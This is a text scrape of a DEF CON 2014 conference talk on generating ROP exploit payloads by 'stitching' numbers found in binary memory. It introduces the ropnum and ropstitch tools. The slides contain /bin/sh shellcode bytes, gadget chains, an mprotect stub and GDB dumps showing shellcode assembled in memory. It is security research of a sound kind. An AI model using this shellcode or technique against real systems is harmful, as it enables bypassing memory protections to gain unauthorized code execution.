SlideShare une entreprise Scribd logo
1  sur  62
Stitching numbers 
Generating ROP payloads from in memory numbers 
Alex Moneger 
Security Engineer 
10th of August 2014
Who am I? 
 Work for Cisco Systems 
 Security engineer in the Cloud Web Security Business Unit (big cloud 
based security proxy) 
 Interested mostly in bits and bytes 
 Disclaimer: research… own time… my opinions… not my employers 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
Agenda 
1. Brief ROP overview 
2. Automating ROP payload generation 
3. Number Stitching 
1. Goal 
2. Finding gadgets 
3. Coin change problem 
4. Pros, Cons, Tooling 
5. Future Work 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
Introduction 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
TL;DR 
 Use only gadgets generated by libc or compiler stubs. In short, target 
the libc or compiler gadgets instead of the binary ones 
 Generate payloads using numbers found in memory 
 Solve the coin change problem to automatically generate ROP 
payloads 
 Automate the payload generation 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
ROP overview 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
Principle 
 Re-use instructions from the vulnerable binary 
 Control flow using the stack pointer 
 Multi-staged: 
1. Build the payload in memory using gadgets 
2. Transfer execution to generated payload 
 Only way around today’s OS protections (let aside home routers, 
embedded systems, IoT, …) 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
Finding instructions 
 Useful instructions => gadgets 
 Disassemble backwards from “ret” instruction 
 Good tools available 
 Number of gadgets to use is dependent upon target binary 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
Transfer control to payload 
 Once payload is built in memory 
 Transfer control by “pivoting” the stack 
 Allows to redirect execution to a stack crafted by the attacker 
 Useful gadgets: 
 leave; ret 
 mv esp, addr; ret 
 add esp, value; ret 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
Automating payload generation 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
Classic approach 
 Find required bytes in memory 
 Copy them to a controlled stack 
 Use either: 
 A mov gadget (1, 2 or 4 bytes) 
 A copy function if available (strcpy, memcpy, …) (variable byte length) 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
Potential problems 
 Availability of a mov gadget 
 Can require some GOT dereferencing 
 Availability of some bytes in memory 
 May require some manual work to get the missing bytes 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
Finding bytes 
 Shellcode requires “sh” (x73x68) 
someone@something:~/somewhere$ 
sc="x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcd 
x80” 
someone@something:~/somewhere$ ROPgadget abinary -opcode "x73x68" 
Gadgets information 
============================================================ 
0x08048321: "x73x68” 
someone@something:~/somewhere$ hexdump -C abinary.text| egrep --color "73(s)*68" 
00000320 75 73 68 00 65 78 69 74 00 73 74 72 6e 63 6d 70 |ush.exit.strncmp| 
 Got it! What about “h/” (x68x2f)? 
someone@something:~/somewhere$ hexdump -C hbinary5-mem.txt | egrep --color "68(s)*2f" 
someone@something:~/somewhere$ 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
mov gadget 
 Very small binaries do not tend to have many mov gadgets 
 In the case of pop reg1; mov [ reg2 ], reg1: 
 Null byte can require manual work 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
Number stitching 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15
Initial problem 
 Is exploiting a “hello world” type vulnerability possible with: 
 RELRO 
 X^W 
 ASLR 
 Can the ROP payload be built only from libc/compiler introduced 
stubs? 
 In other words, is it possible not to use any gadgets from the target 
binary code to build a payload? 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 16
Program anatomy 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 17
Libc static functions 
 What other code surrounds the “hello world” code? 
someone@something:~/somewhere$ pygmentize abinary.c 
#include <stdio.h> 
int main(int argc, char **argv, char** envp) { 
printf("Hello Defcon!!n"); 
} 
 Does libc add anything at link time? 
someone@something:~/somewhere$ objdump -d -j .text -M intel abinary| egrep '<(.*)>:' 
08048510 <_start>: 
080489bd <main>: 
080489f0 <__libc_csu_fini>: 
08048a00 <__libc_csu_init>: 
08048a5a <__i686.get_pc_thunk.bx>: 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 18
Where does this come from? 
 At link time “libc.so” is used 
 That’s a script which both dynamically and statically links libc: 
someone@something:~/somewhere$ cat libc.so 
/* GNU ld script 
Use the shared library, but some functions are only in 
the static library, so try that secondarily. */ 
OUTPUT_FORMAT(elf32-i386) 
GROUP ( /lib/i386-linux-gnu/libc.so.6 /usr/lib/i386-linux-gnu/libc_nonshared.a AS_NEEDED ( /lib/i386- 
linux-gnu/ld-linux.so.2 ) ) 
 Looks libc_nonshared.a statically links some functions: 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 19
What is statically linked? 
 Quite a few functions are: 
someone@something:~/somewhere$ objdump -d -j .text -M intel /usr/lib/i386-linux-gnu/libc_nonshared.a | egrep 
'<*>:' 
00000000 <__libc_csu_fini>: 
00000010 <__libc_csu_init>: 
00000000 <atexit>: 
00000000 <at_quick_exit>: 
00000000 <__stat>: 
00000000 <__fstat>: 
00000000 <__lstat>: 
00000000 <stat64>: 
00000000 <fstat64>: 
00000000 <lstat64>: 
00000000 <fstatat>: 
00000000 <fstatat64>: 
00000000 <__mknod>: 
00000000 <mknodat>: 
00000000 <__warn_memset_zero_len>: 
00000000 <__stack_chk_fail_local>: 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 20
Gadgets in static functions 
 Those functions are not always included 
 Depend on compile options (-fstack-protector, …) 
 I looked for gadgets in them. 
 Fail… 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 21
Anything else added? 
 Is there anything else added which is constant: 
 get_pc_thunk.bx() used for PIE, allows access to GOT 
 _start() is the “real” entry point of the program 
 There are also a few “anonymous” functions (no symbols) introduced 
by gcc. 
 Those functions relate to profiling 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 22
Static linking 
 Profiling is surprisingly on by default on some distros. To check default 
compiling options: cc –Q –v. 
 Look for anything statically linking 
 This work was done on gcc 4.4.5 
 Looking for gadgets in that, yields some results! 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 23
Useful gadgets against gcc 4.4.5 
 What I get to work with: 
1. Control of ebx in an profiling function: pop ebx ; pop ebp ;; 
2. Stack pivoting in profiling function: leave ;; 
3. Write to mem in profiling function: add [ebx+0x5d5b04c4] eax ;; 
4. Write to reg in profiling function: add eax [ebx-0xb8a0008] ; add esp 
0x4 ; pop ebx ; pop ebp ;; 
 In short, attacker controls: 
 ebx 
 That’s it… 
 Can anything be done to control the value in eax? 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 24
Shellcode to numbers 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 25
Accumulating 
 Useful gadget: add eax [ebx-0xb8a0008] ; (removed trailing junk) 
 We control ebx, so we can add arbitrary memory with eax 
 Is it useful? 
 Yes, let’s come back to this later 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 26
Dumping 
 Useful gadget: add [ebx+0x5d5b04c4] eax ;; 
 Ebx is under attacker control 
 For the time being, assume we control eax 
 Gadget allows to add a value from a register to memory 
 If attacker controls eax in someway, this allows to write anywhere 
 Use this in order to dump a value to a custom stack 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 27
Approach 
 Choose a spot in memory to build a stack: 
 .data section is nice 
 must be a code cave (mem spot with null bytes), since we are performing add 
operations 
 Choose a shellcode to write to the stack: 
 As an example, use a setreuid shellcode 
 Nothing unusual in all this 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 28
Chopping shellcode 
1. Next, cut the shellcode into 4 byte chunks 
2. Interpret each chunk as an integer 
3. Keep track of the index of each chunk position 
4. Order them from smallest to biggest 
5. Compute the difference between chunks 
6. There is now a set of monotonically increasing values representing 
the shellcode 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 29
Visual chopping 
1 2 3 
x0dx0cx0bx0a x08x07x06x05 x04x03x02x01 
0x01020304 0x05060708 0x0a0b0c0d 
3 2 1 
0x05060708 – 
0x01020304 
2 
0x0a0b0c0d – 
0x05060708 
1 
0x01020304 0x04040404 0x05050505 
3 2 1 
Shellcode 
Chunks 
Deltas 
Monotonically 
increasing 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 30
Reverse process 
 Shellcode is represented as increasing deltas 
 Add delta n with n+1 
 Dump that delta at stack index 
 Repeat 
 We’ve copied our shellcode to our stack 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 31
Example 
1. Find address of number 0x01020304 in memory 
2. Load that address into ebx 
3. Add mem to reg. Eax contains 0x01020304 
4. Add reg to mem at index 3. Fake stack contains “x04x03x02x01” 
5. Find address of number 0x04040404 in memory and load into ebx 
6. Add mem to reg. Eax contains 0x01020304 + 0x04040404 = 0x05060708 
7. Add reg to mem. Fake stack contains “x08x07x06x05x04x03x02x01” 
8. Repeat 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 32
Problem 
 How easy is it to find the shellcode “numbers” in memory? 
 Does memory contain numbers such as: 
 0x01020304 
 "x6ax31x58x99” => 0x66a7ce96 (string to 2’s complement integer) 
 If not, how can we build those numbers to get our shellcode? 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 33
Stitching numbers 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 34
Answers 
 It’s not easy to find “big” numbers in memory 
 Shellcode chunks are big numbers 
 Example: looking for 0x01020304: 
someone@something:~/somewhere$ gdb hw 
gdb-peda$ peda searchmem 0x01020304 .text 
Searching for '0x01020304' in: .text ranges 
Not found 
 In short, not many large numbers in memory 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 35
Approach 
 Scan memory regions in ELF: 
 RO segment (contains .text, .rodata, …) is a good candidate: 
 Read only so should not change at runtime 
 If not PIE, addresses are constant 
 Keep track of all numbers found and their addresses 
 Find the best combination of numbers which add up to a chunk 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 36
Coin change problem 
 This is called the coin change problem 
 If I buy an item at 4.25€ and pay with a 5€ note 
 What’s the most efficient way to return change? 
 0.75€ change: 
 1 50 cent coin 
 1 20 cent coin 
 1 5 cent coin 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 37
In hex you’re a millionaire 
 In dollars, answer is different 
 0.75$: 
 1 half-dollar coin 
 1 quarter 
 Best solution depends on the coin set 
 Our set of coins are the numbers found in memory 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 38
Solving the problem 
 Ideal solution to the problem is using Dynamic Programming: 
 Finds most efficient solution 
 Blows memory for big numbers 
 I can’t scale it for big numbers yet 
 Sub-optimal solution is the greedy approach: 
 No memory footprint 
 Can miss the solution 
 Look for the biggest coin which fits, then go down 
 Luckily small numbers are easy to find in memory, meaning greedy will 
always succeed 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 39
Greedy approach 
 75 cents change example: 
 Try 2 euros ✖ 
 Try 1 euro ✖ 
 Try 50 cents ✔ 
 Try 20 cents ✔ 
 Try 10 cents ✖ 
 Try 5 cents ✔ 
 Found solution: 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 40
Introducing Ropnum 
 Tool to find a solution to the coin change problem 
 Give it a number, will get you the address of numbers which solve the 
coin change problem 
 Can also: 
 Ignore addresses with null-bytes 
 Exclude numbers from the coin change solver 
 Print all addresses pointing to a number 
 … 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 41
Usage 
 Find me: 
 The address of numbers… 
 In the segment containing the .text section 
 Which added together solve the coin change problem (i.e.: 0x01020304) 
someone@something:~/somewhere$ ropnum.py -n 0x01020304 -S -s .text hw 2> /dev/null 
Using segments instead of sections to perform number lookups. 
Using sections [.text] for segment lookup. 
Found loadable segment starting at [address 0x08048000, offset 0x00000000] 
Found a solution using 5 operations: [16860748, 47811, 392, 104, 5] 
0x08048002 => 0x0101464c 16860748 
0x0804804c => 0x00000005 5 
0x080482f6 => 0x00000068 104 
0x08048399 => 0x0000bac3 47811 
0x08048500 => 0x00000188 392 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 42
Ropnum continued 
 Now you can use an accumulating gadget on the found addresses 
someone@something:~/somewhere$ ropnum.py -n 0x01020304 -S -s .text hw 2> /dev/null 
Found a solution using 5 operations: [16860748, 47811, 392, 104, 5] 
0x08048002 => 0x0101464c 16860748 
0x0804804c => 0x00000005 5 
0x080482f6 => 0x00000068 104 
0x08048399 => 0x0000bac3 47811 
0x08048500 => 0x00000188 392 
someone@something:~/somewhere$ python -c 'print 
hex(0x00000188+0x0000bac3+0x00000068+0x00000005+0x0101464c)' 
0x1020304 
 add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop 
ebp ;; 
 By controlling the value addressed by ebx, you control eax 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 43
Putting it together 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 44
Summary 
 Cut and order 4 byte shellcode chunks 
 Add numbers found in memory together until you reach a chunk 
 Once a chunk is reached, dump it to a stack frame 
 Repeat until shellcode is complete 
 Transfer control to shellcode 
 Git it at https://github.com/alexmgr/numstitch 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 45
Introducing Ropstitch 
 What it does: 
 Takes an input shellcode, and a frame address 
 Takes care of the tedious details (endianess, 2’s complement, padding, … ) 
 Spits out some python code to generate your payload 
 Additional features: 
 Add an mprotect RWE stub frame before your stack 
 Start with an arbitrary accumulator register value 
 Lookup numbers in section or segments 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 46
Why do you need an mprotect stub 
 The fake stack lives in a RW section 
 You need to make that page RE 
 Mprotect allows to change permissions at runtime 
 The mprotect stub will change the permissions of the page to allow 
shellcode execution 
 Mprotect(page base address, page size (0x1000), RWE (0x7)) 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 47
Example usage 
 Generate a python payload: 
 To copy a /bin/sh shellcode: 
 To a fake frame frame located at 0x08049110 (.data section) 
 Appending an mprotect frame (default behaviour) 
 Looking up numbers in RO segment 
 In binary abinary 
someone@something:~/somewhere$ ropstitch.py -x 
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0x0bx52x68x6ex2fx73x6 
8x68x2fx2fx62x69x89xe3x89xd1xcdx80" -f 0x08049110 -S -s .text -p abinary 2> 
/dev/null 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 48
Example tool output 
 The tool will spit out some python code, where you need to add your 
gadget addresses 
 Then run that to get your payload 
 Output is too verbose. See an example and further explanations on 
numstitch_details.txt (Defcon CD) or here: 
https://github.com/alexmgr/numstitch 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 49
GDB output 
gdb-peda$ x/16w 0x804a11c 
0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00000000 
0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000 
0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000 
0x804a14c: 0x00000000 0x00000000 0x00000000 0x00000000 
gdb-peda$ # Writing int 0x80. Notice that the numbers are added in increasing order: 
0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00000000 
0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000 
0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000 
0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000 
gdb-peda$ # Writing mprotect page size (0x1000). Notice that the numbers are added in increasing order: 
0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00001000 
0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000 
0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000 
0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000 
gdb-peda$ c 10 
gdb-peda$ # later execution (notice the missing parts of shellcode, which will be filed in later, once 
eax reaches a slice value): 
0x804a11c: 0xb7f31e00 0x0804a130 0x0804a000 0x00001000 
0x804a12c: 0x00000007 0x00000000 0x2d686652 0x52e18970 
0x804a13c: 0x2f68686a 0x68736162 0x6e69622f 0x5152e389 
0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000 
gdb-peda$ # end result (The shellcode is complete in memory): 
0x804a11c: 0xb7f31e00 0x0804a130 0x0804a000 0x00001000 
0x804a12c: 0x00000007 0x99580b6a 0x2d686652 0x52e18970 
0x804a13c: 0x2f68686a 0x68736162 0x6e69622f 0x5152e389 
0x804a14c: 0xcde18953 0x00000080 0x00000000 0x00000000 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 50
Pros and cons 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 51
Number stitching 
 Pros: 
 Can encode any shellcode (no null-byte problem) 
 Lower 2 bytes can be controlled by excluding those values from the 
addresses 
 Not affected by RELRO, ASLR or X^W 
 Cons: 
 Payloads can be large, depending on the availability of number 
 Thus requires a big stage-0, or a gadget table 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 52
Further usage 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 53
Initialize eax 
 What if the value of eax changes between runtimes? 
 In stdcall convention, eax holds the return value of a function call 
 Just call any function in the PLT 
 There is a good chance you control the return value that way 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 54
Shrink the size of the stage-0 
 Number stitching can also be used to load further gadgets instead of a 
shellcode 
 Concept of a gadget table 
 Say you need: 
 Pop ecx; ret; => 59 c3 
 Pop ebx; ret; => 5b c3 
 mov [ecx] ebx; ret; => 89 19 c3 
 Your shellcode becomes: “x59xc3x5bxc3x89x19xc3” 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 55
Gadget table 
 Number stitching can transfer those bytes to memory 
 ropstitch can change the memory permissions with the mprotect stub 
 You can then just call the gadgets from the table as if they we’re part of 
the binary 
 You have the ability to load any gadget or byte in memory 
 This is not yet automated in the tool 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 56
Future work 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 57
General 
 Search if there are numbers in memory not subject to ASLR: 
 Check binaries with PIE enabled to see if anything comes up 
 By definition, probably wont come up with anything, but who knows? 
 Search for gadgets in new versions of libc/gcc. Seems difficult, but 
might yield a new approach 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 58
Tooling 
 Get dynamic programming approach to work with large numbers: 
 Challenging 
 64 bit support. Easy, numbers are just bigger. Mprotect stack might be 
harder because of the different ABI 
 Introduce a mixed approach: 
 String copying for bytes available 
 Number stitching for others 
 Maybe contribute it to some rop tools (if they’re interested) 
 Simplify the concept of gadget tables in the tool 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 59
Contact details 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 60
Alex Moneger 
 amoneger@cisco.com 
 https://github.com/alexmgr/numstitch 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 61
Thank 
you!

Contenu connexe

Tendances

Using the Android Native Development Kit (NDK)
Using the Android Native Development Kit (NDK)Using the Android Native Development Kit (NDK)
Using the Android Native Development Kit (NDK)Xavier Hallade
 
Dmitry Schelkunov, Vasily Bukasov - About practical deobfuscation
Dmitry Schelkunov, Vasily Bukasov - About practical deobfuscationDmitry Schelkunov, Vasily Bukasov - About practical deobfuscation
Dmitry Schelkunov, Vasily Bukasov - About practical deobfuscationDefconRussia
 
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devicessrkedmi
 
OpenStack and OpenFlow Demos
OpenStack and OpenFlow DemosOpenStack and OpenFlow Demos
OpenStack and OpenFlow DemosBrent Salisbury
 
RTOS application verified by VeriFast, and future plan
RTOS application verified by VeriFast, and future planRTOS application verified by VeriFast, and future plan
RTOS application verified by VeriFast, and future planKiwamu Okabe
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLPositive Hack Days
 
Metasepi team meeting #7: Snatch application on tiny OS
Metasepi team meeting #7: Snatch application on tiny OSMetasepi team meeting #7: Snatch application on tiny OS
Metasepi team meeting #7: Snatch application on tiny OSKiwamu Okabe
 
DEF CON 27 - workshop - MAURICIO VELAZCO - writing custom paylods
DEF CON 27 - workshop - MAURICIO VELAZCO - writing  custom paylodsDEF CON 27 - workshop - MAURICIO VELAZCO - writing  custom paylods
DEF CON 27 - workshop - MAURICIO VELAZCO - writing custom paylodsFelipe Prado
 
What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?Amanda Rousseau
 
What's new in FreeBSD 10
What's new in FreeBSD 10What's new in FreeBSD 10
What's new in FreeBSD 10Gleb Smirnoff
 
Debugging with pry
Debugging with pryDebugging with pry
Debugging with pryCreditas
 
Cisco usNIC libfabric provider
Cisco usNIC libfabric providerCisco usNIC libfabric provider
Cisco usNIC libfabric providerJeff Squyres
 
Tackling non-determinism in Hadoop - Testing and debugging distributed system...
Tackling non-determinism in Hadoop - Testing and debugging distributed system...Tackling non-determinism in Hadoop - Testing and debugging distributed system...
Tackling non-determinism in Hadoop - Testing and debugging distributed system...Akihiro Suda
 
Python for IoT, A return of experience
Python for IoT, A return of experiencePython for IoT, A return of experience
Python for IoT, A return of experienceAlexandre Abadie
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Positive Hack Days
 
Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...
Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...
Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...Brent Salisbury
 
Swift 2 Under the Hood - Gotober 2015
Swift 2 Under the Hood - Gotober 2015Swift 2 Under the Hood - Gotober 2015
Swift 2 Under the Hood - Gotober 2015Alex Blewitt
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Maksim Shudrak
 

Tendances (20)

Using the Android Native Development Kit (NDK)
Using the Android Native Development Kit (NDK)Using the Android Native Development Kit (NDK)
Using the Android Native Development Kit (NDK)
 
Dmitry Schelkunov, Vasily Bukasov - About practical deobfuscation
Dmitry Schelkunov, Vasily Bukasov - About practical deobfuscationDmitry Schelkunov, Vasily Bukasov - About practical deobfuscation
Dmitry Schelkunov, Vasily Bukasov - About practical deobfuscation
 
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
 
OpenStack and OpenFlow Demos
OpenStack and OpenFlow DemosOpenStack and OpenFlow Demos
OpenStack and OpenFlow Demos
 
RTOS application verified by VeriFast, and future plan
RTOS application verified by VeriFast, and future planRTOS application verified by VeriFast, and future plan
RTOS application verified by VeriFast, and future plan
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDL
 
Metasepi team meeting #7: Snatch application on tiny OS
Metasepi team meeting #7: Snatch application on tiny OSMetasepi team meeting #7: Snatch application on tiny OS
Metasepi team meeting #7: Snatch application on tiny OS
 
DEF CON 27 - workshop - MAURICIO VELAZCO - writing custom paylods
DEF CON 27 - workshop - MAURICIO VELAZCO - writing  custom paylodsDEF CON 27 - workshop - MAURICIO VELAZCO - writing  custom paylods
DEF CON 27 - workshop - MAURICIO VELAZCO - writing custom paylods
 
What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
What's new in FreeBSD 10
What's new in FreeBSD 10What's new in FreeBSD 10
What's new in FreeBSD 10
 
Debugging with pry
Debugging with pryDebugging with pry
Debugging with pry
 
Cisco usNIC libfabric provider
Cisco usNIC libfabric providerCisco usNIC libfabric provider
Cisco usNIC libfabric provider
 
Tackling non-determinism in Hadoop - Testing and debugging distributed system...
Tackling non-determinism in Hadoop - Testing and debugging distributed system...Tackling non-determinism in Hadoop - Testing and debugging distributed system...
Tackling non-determinism in Hadoop - Testing and debugging distributed system...
 
Python for IoT, A return of experience
Python for IoT, A return of experiencePython for IoT, A return of experience
Python for IoT, A return of experience
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
 
Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...
Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...
Augmenting Flow Operations and Feedback on the Model Driven MD_SAL Approach i...
 
Swift 2 Under the Hood - Gotober 2015
Swift 2 Under the Hood - Gotober 2015Swift 2 Under the Hood - Gotober 2015
Swift 2 Under the Hood - Gotober 2015
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
 

En vedette

So we don't go foe hoin ass to tryin play checc up.pt.2.doc
So we don't go foe hoin ass to tryin play checc up.pt.2.docSo we don't go foe hoin ass to tryin play checc up.pt.2.doc
So we don't go foe hoin ass to tryin play checc up.pt.2.docMurad Wysinger
 
药食同源2
药食同源2药食同源2
药食同源2mikejiang
 
crtical points for customizing Joomla templates
crtical points for customizing Joomla templatescrtical points for customizing Joomla templates
crtical points for customizing Joomla templatesamit das
 
20150410 呂家華 01.主持工具箱(一)
20150410 呂家華 01.主持工具箱(一)20150410 呂家華 01.主持工具箱(一)
20150410 呂家華 01.主持工具箱(一)Chia Hua Lu
 
6/25 案例分析 - 小結
6/25 案例分析 - 小結6/25 案例分析 - 小結
6/25 案例分析 - 小結佩琪 羅
 
CyberLab CCEH Session - 18 Cryptography
CyberLab CCEH Session - 18 CryptographyCyberLab CCEH Session - 18 Cryptography
CyberLab CCEH Session - 18 CryptographyCyberLab
 
公民憲政會議【草根論壇】主持培訓手冊
公民憲政會議【草根論壇】主持培訓手冊公民憲政會議【草根論壇】主持培訓手冊
公民憲政會議【草根論壇】主持培訓手冊Chia Hua Lu
 
2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報
2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報
2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報小四 曾
 
CyberLab CCEH Session -13 Hacking Web Applications
CyberLab CCEH Session -13 Hacking Web ApplicationsCyberLab CCEH Session -13 Hacking Web Applications
CyberLab CCEH Session -13 Hacking Web ApplicationsCyberLab
 
1051222公民科技培力工作坊簡報
1051222公民科技培力工作坊簡報 1051222公民科技培力工作坊簡報
1051222公民科技培力工作坊簡報 Huang Pei Chi
 
縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉
縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉
縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉cettw
 
Encuestas agropecuarias integradas (AGRIS)
